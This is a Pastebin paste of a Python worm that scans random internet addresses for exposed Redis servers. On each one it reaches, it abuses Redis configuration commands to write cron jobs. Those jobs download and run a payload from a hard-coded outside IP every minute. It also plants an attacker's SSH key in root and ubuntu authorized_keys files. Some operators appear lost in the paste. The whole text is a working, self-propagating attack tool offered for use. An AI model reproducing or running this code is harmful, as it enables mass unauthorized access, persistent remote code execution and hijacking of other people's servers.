SHARE
TWEET

sc

a guest Aug 16th, 2019 49 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! /usr/bin/env python
  2. #coding: utf-8
  3.  
  4. import threading
  5. import socket
  6. from re import findall
  7. import httplib
  8. import os
  9. from random import randrange
  10. import random
  11. import string
  12.  
  13. IP_LIST = []
  14. debug=0
  15.  
  16. class scanner(threading.Thread):
  17.     tlist = []
  18.     maxthreads = 100
  19.     evnt = threading.Event()
  20.     lck = threading.Lock()
  21.  
  22.     def __init__(self,host):
  23.         threading.Thread.__init__(self)
  24.         self.host = host
  25.     def run(self):
  26.         RHOST='http://154.16.67.135/'
  27.         TOR1=''
  28.         TOR3=''
  29.         TOR2=''
  30.         CHKCURL='tbin=$(command -v passwd); bpath=$(dirname \\"${tbin}\\"); curl=\\"curl\\"; if [ $(curl --version 2>/dev/null|grep \\"curl \\"|wc -l) -eq 0 ]; then curl=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"CURLOPT_VERBOSE\\" && curl=\\"$f\\" && break; done; fi; fi; wget=\\"wget\\"; if [ $(wget --version 2>/dev/null|grep \\"wgetrc \\"|wc -l) -eq 0 ]; then wget=\\"echo\\"; if [ \\"${bpath}\\" != \\"\\" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q \\"to <bug-wget@gnu.org>\\" && wget=\\"$f\\" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i \\".onion.\\"|wc -l) -ne 0 ]; then echo \\"127.0.0.1 localhost\\" > /etc/hosts >/dev/null 2>&1; fi; '
  31.         RPATH1='src/ldm'
  32.         TIMEOUT='40'
  33.         COPTS='-fsSLk --max-time ' TIMEOUT
  34.         WOPTS='--quiet --no-check-certificate --timeout=' TIMEOUT
  35.         C1='\\n\\n*/1 * * * * root (' CHKCURL ' ${curl} ' COPTS ' ' RHOST TOR1 RPATH1 ' -o ~/.ntp||${curl} ' COPTS ' ' RHOST TOR2 RPATH1 ' -o ~/.ntp||${curl} ' COPTS ' ' RHOST TOR3 RPATH1 ' -o ~/.ntp||wget ' WOPTS ' ' RHOST TOR1 RPATH1 ' -O ~/.ntp||wget ' WOPTS ' ' RHOST TOR2 RPATH1 ' -O ~/.ntp||wget ' WOPTS ' ' RHOST TOR3 RPATH1 ' -O ~/.ntp) && chmod  x ~/.ntp && sh ~/.ntp\\n\\n'
  36.         C2='\\n\\n*/1 * * * * (' CHKCURL ' ${curl} ' COPTS ' ' RHOST TOR1 RPATH1 ' -o ~/.ntp||${curl} ' COPTS ' ' RHOST TOR2 RPATH1 ' -o ~/.ntp||${curl} ' COPTS ' ' RHOST TOR3 RPATH1 ' -o ~/.ntp||wget ' WOPTS ' ' RHOST TOR1 RPATH1 ' -O ~/.ntp||wget ' WOPTS ' ' RHOST TOR2 RPATH1 ' -O ~/.ntp||wget ' WOPTS ' ' RHOST TOR3 RPATH1 ' -O ~/.ntp) && chmod  x ~/.ntp && sh ~/.ntp\\n\\n'
  37.         SKEY="\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAsdBAQC1Sdr0tIILsd8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx AHyvBL8jDZDJ6fuVwEB aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost\\n#"
  38.         try:
  39.             s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  40.             s2.settimeout(3)
  41.             x = s2.connect_ex((self.host, 6379))
  42.             if x == 0:
  43.                 DFDIR=DFRDB='N/A'
  44.                 stt1=stt2=stt3=stt4=stt5=-9
  45.                 tmp=rd(s2, 'config get dir\r\n')
  46.                 if "Authentication required" in str(tmp): stt1=-10
  47.                 elif "-ERR unknown command" not in str(tmp):
  48.                     if 'dir' in str(tmp): DFDIR=(tmp.split('dir'))[1].splitlines()[2]
  49.                     tmp=rd(s2, 'config get dbfilename\r\n')
  50.                     if 'dbfilename' in str(tmp): DFRDB=(tmp.split('dbfilename'))[1].splitlines()[2]
  51.                     rs=rd(s2, 'config set dbfilename root\r\n')
  52.                     if " OK" in str(rs):
  53.                         rs=rd(s2, 'config set rdbcompression no\r\n')
  54.                         if " OK" in str(rs):
  55.                             write=rd(s2, 'flushall\r\n')
  56.                             if "write against a read only" in str(write):
  57.                                 rd(s2, 'SLAVEOF NO ONE\r\n')
  58.                                 write=rd(s2, 'flushall\r\n')
  59.                             if "write against a read only" not in str(write):
  60.                                 K1=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
  61.                                 K2=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
  62.                                 K3=''.join(random.choice(string.lowercase) for x in range(random.randint(4, 10)))
  63.                                 CF=''.join(random.choice(string.lowercase) for x in range(random.randint(6, 18)))
  64.                                 rs=rd(s2, 'config set stop-writes-on-bgsave-error no\r\n')
  65.                                 #rs=rd(s2, 'set ' K1 ' "' C1 '"\r\n')
  66.                                 rs=rd(s2, 'set ' K2 ' "' C2 '"\r\n')
  67.                                 apt=chkdir(s2, '/usr/share/bug/apt/')
  68.                                 if apt == -4:
  69.                                     fml='N.'
  70.                                     stt1=chkdir(s2, '/var/spool/cron')
  71.                                 else:
  72.                                     fml='Debian.'
  73.                                     stt1=chkdir(s2, '/var/spool/cron/crontabs')
  74.                                 pine=chkdir(s2, '/etc/crontabs')
  75.                                 rs=rd(s2, 'del ' K2 '\r\n')
  76.                                 rs=rd(s2, 'set ' K1 ' "' C1 '"\r\n')
  77.                                 rs=rd(s2, 'config set dbfilename .' CF '\r\n')
  78.                                 stt2=chkdir(s2, '/etc/cron.d')
  79.                                 rs=rd(s2, 'config set dbfilename crontab\r\n')
  80.                                 stt22=chkdir(s2, '/etc')
  81.                                 if stt2 < 2: stt2=stt22
  82.                                 rs=rd(s2, 'del ' K1 '\r\n')
  83.                                 rs=rd(s2, 'config set dbfilename authorized_keys\r\n')
  84.                                 rs=rd(s2, 'set ' K3 ' "' SKEY '"\r\n')
  85.                                 stt3=chkdir(s2, '/root/.ssh')
  86.                                 stt4=chkdir(s2, '/home/ubuntu/.ssh')
  87.                                 #time.sleep(1)
  88.                                 rs=rd(s2, 'del ' K3 '\r\n')
  89.                             rs=rd(s2, 'config set rdbcompression yes\r\n')
  90.                             rs=rd(s2, 'config set stop-writes-on-bgsave-error yes\r\n')
  91.                         if "cron" not in str(DFDIR) and ".ssh" not in str(DFDIR):
  92.                             rs=rd(s2, 'config set dir ' DFDIR '\r\n')
  93.                             rs=rd(s2, 'config set dbfilename ' DFRDB '\r\n')
  94.                         else:
  95.                             rs=rd(s2, 'config set dir /var/lib/redis\r\n')
  96.                             rs=rd(s2, 'config set dbfilename dump.rdb\r\n')
  97.             s2.close()
  98.         except Exception:
  99.             pass
  100.        
  101.         scanner.lck.acquire()
  102.         scanner.tlist.remove(self)
  103.         if len(scanner.tlist) < scanner.maxthreads:
  104.             scanner.evnt.set()
  105.             scanner.evnt.clear()
  106.         scanner.lck.release()
  107.  
  108.     def newthread(host):
  109.         scanner.lck.acquire()
  110.         sc = scanner(host)
  111.         scanner.tlist.append(sc)
  112.         scanner.lck.release()
  113.         sc.start()
  114.  
  115.     newthread = staticmethod(newthread)
  116.  
  117. def get_ip_list():
  118.     try:
  119.         url = 'ifconfig.co/ip'
  120.         conn = httplib.HTTPConnection(url, port=80, timeout=10)
  121.         conn.request(method='GET', url='/', )
  122.         result = conn.getresponse()
  123.         ip1 = result.read()
  124.         ips1 = findall(r'\d .\d .', ip1)[0]
  125.         for u in range(0, 256):
  126.             ip_list1 = (ips1   (str(u)))
  127.             for g in range(1, 256):
  128.                 IP_LIST.append(ip_list1   '.'   (str(g)))
  129.     except Exception:
  130.         ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip()
  131.         ips2 = findall(r'\d .\d .', ip2)[0]
  132.         for i in range(0, 255):
  133.             ip_list2 = (ips2   (str(i)))
  134.             for g in range(1, 255):
  135.                 IP_LIST.append(ip_list2   '.'   (str(g)))
  136.         pass
  137.  
  138. def get_ip_list2():
  139.     not_valid = [10,127,169,172,192]
  140.     for i in range(0, 100000):
  141.         first = randrange(1,227)
  142.         while first in not_valid:
  143.             first = randrange(1,227)
  144.         ip = ".".join([str(first),str(randrange(0,256)),
  145.         str(randrange(0,256)),str(randrange(0,256))])
  146.         IP_LIST.append(ip)
  147.  
  148. def runPortscan():
  149.     for x in range(99999):
  150.         get_ip_list2()
  151.         for host in IP_LIST:
  152.             scanner.lck.acquire()
  153.             if len(scanner.tlist) >= scanner.maxthreads:
  154.                 scanner.lck.release()
  155.                 scanner.evnt.wait()
  156.             else:
  157.                 scanner.lck.release()
  158.             scanner.newthread(host)
  159.         for t in scanner.tlist:
  160.             t.join()
  161.  
  162. def rd(sock, packet):
  163.     try:
  164.         sock.send(packet)
  165.         reply = sock.recv(1024)
  166.         if not reply: pass
  167.         if '*' not in reply and '$' not in reply and ' ' not in reply and ':' not in reply and debug >= 2: print(reply)
  168.         return reply
  169.     except:
  170.         pass
  171.  
  172. def chkdir(sock, dir):
  173.     stt=0
  174.     rs=rd(sock, 'config set dir ' dir '\r\n')
  175.     if " OK" in str(rs):
  176.         stt=1
  177.         rs=rd(sock, 'save\r\n')
  178.         if " OK" in str(rs):
  179.             stt=2
  180.     elif "o such file or " in str(rs): stt=-4
  181.     return stt
  182.  
  183. if __name__ == "__main__":
  184.     try:
  185.         runPortscan()
  186.     except KeyboardInterrupt:
  187.         try:
  188.             exit(0)
  189.         except SystemExit:
  190.             os._exit(0)
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top